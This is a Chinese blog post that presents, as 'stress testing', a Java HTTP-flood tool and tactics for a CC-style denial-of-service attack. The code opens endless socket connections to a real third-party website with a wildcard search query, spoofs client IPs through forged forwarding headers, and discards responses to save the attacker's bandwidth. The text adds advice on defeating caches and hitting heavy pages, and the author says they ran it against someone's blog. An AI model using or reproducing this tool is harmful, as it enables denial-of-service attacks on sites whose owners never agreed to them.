何为压测,何为DDOS攻击、CC攻击,我想,百度会告诉你一切。
在做这件事情之前,我先贴上一份代码,如果你是测试工程师,或许这份代码对你有用。
1package com.ezone.test.socket; 2 3import java.net.InetSocketAddress; 4import java.net.Socket; 5import java.net.URL; 6import java.util.concurrent.ExecutorService; 7import java.util.concurrent.LinkedBlockingQueue; 8import java.util.concurrent.ThreadPoolExecutor; 9import java.util.concurrent.TimeUnit; 10 11public class PressureTest { 12 13 public static void main(String[] args) throws Exception { 14 httpFlush("http://www.songpeng.net/?s=*", 10, 5000, 100000); 15 } 16 17 /** 18 * 发包方法 19 * @urlString 目标网址 20 * @thread 线程数 21 * @connecttimeOut 连接超时时间 22 * @timeMillisecond 压测时长 23 */ 24 public static void httpFlush(String urlString, Integer thread, Integer connecttimeOut, long timeMillisecond) 25 throws Exception { 26 URL url = new URL(urlString); 27 StringBuilder httpData = new StringBuilder(); 28 httpData.append("GET " + urlString + " HTTP/1.1\r\n"); 29 Integer port = url.getPort() == -1 ? 80 : url.getPort(); 30 String host = url.getHost() + ":" + port; 31 httpData.append("Host: " + host + "\r\n"); 32 httpData.append("Accept: */*\r\n"); 33 String ip = getRandomIp(); 34 httpData.append("x-forwarded-for: " + ip); 35 httpData.append("Proxy-Client-IP: " + ip); 36 httpData.append("WL-Proxy-Client-IP: " + ip); 37 httpData.append("Content-Type: application/x-www-form-urlencoded\r\n"); 38 httpData.append("\r\n"); 39 byte[] data = httpData.toString().getBytes("UTF-8"); 40 for (int i = 0; i < thread; i++) { 41 sysThreadPool.execute(new Runnable() { 42 @SuppressWarnings("resource") 43 @Override 44 public void run() { 45 while (true) { 46 try { 47 Socket socket = new Socket(); 48 socket.connect(new InetSocketAddress(url.getHost(), port), connecttimeOut); 49 socket.setKeepAlive(true); 50 socket.getOutputStream().write(data); 51 socket.getOutputStream().flush(); 52 socket = null; 53 } catch (Exception e) { 54 e.printStackTrace(); 55 } 56 } 57 } 58 }); 59 } 60 while (true) { 61 Thread.sleep(5); 62 System.gc(); 63 } 64 } 65 66 public static String getRandomIp() { 67 68 return getRanDom(1, 254) + "." + getRanDom(1, 254) + "." + getRanDom(1, 254) + "." + getRanDom(1, 254); 69 } 70 71 public static Integer getRanDom(int start, int end) { 72 return (int) (Math.random() * (end - start + 1)) + start; 73 } 74 75 public static final int CORESIZE_NORMAL = 200;// 线程数 76 public static final int MAXCORESIZE = 200; // 最大线程数 77 public static final int KEEPALIVETIME = 10; // 10s 78 public static final ExecutorService sysThreadPool = new ThreadPoolExecutor(CORESIZE_NORMAL, MAXCORESIZE, 79 KEEPALIVETIME, TimeUnit.SECONDS, new LinkedBlockingQueue<Runnable>()); 80}
为了避免这份代码被人恶意利用,以上不提供多余功能。仅仅提供一个GET的测试。
测试实例前言:在一个群里有一位大神发了一个博客,本人可能闲着无聊缺乏存在感,故此测试了一下
一般情况下来说,我们直接贴上一个非静态链接即可,但是为了达到四两拨千斤的效果可以这样子做。
1、该网站是否有缓存,如果有,那就添加动态参数
2、该网站是否有类似于模糊搜索,如果有,那就搜索*号之类的通配符或者涉及最广的关键字,让服务器负载大数据。
3、如果该网站有大数据列表,那就跳转到最后一页。压测这一页即可(需在无缓存情况下)
先来看看效果:

效果:

控制台的错误不用理会,本次测试仅采用十个线程。
十个线程伪概念:本次关于发包线程仅10个,关于连接数,可能几千个(具体原理请分析代码技巧)
压测之四两拨千斤核心观念:
1、传统的http请求肯定不能用于压测,原因是请求一次,响应一次,而响应数据同时占用了客户端的带宽,故此,客户端请求后,不需要接受响应,让服务器单相思去。
2、寻找可以令服务器产生内存或带宽(包括网络带宽/IO带宽等)负载的接口进行压测
综合以上种种情况,本次压测,仅消耗客户端10KB网速即可另服务器over。
By:Coody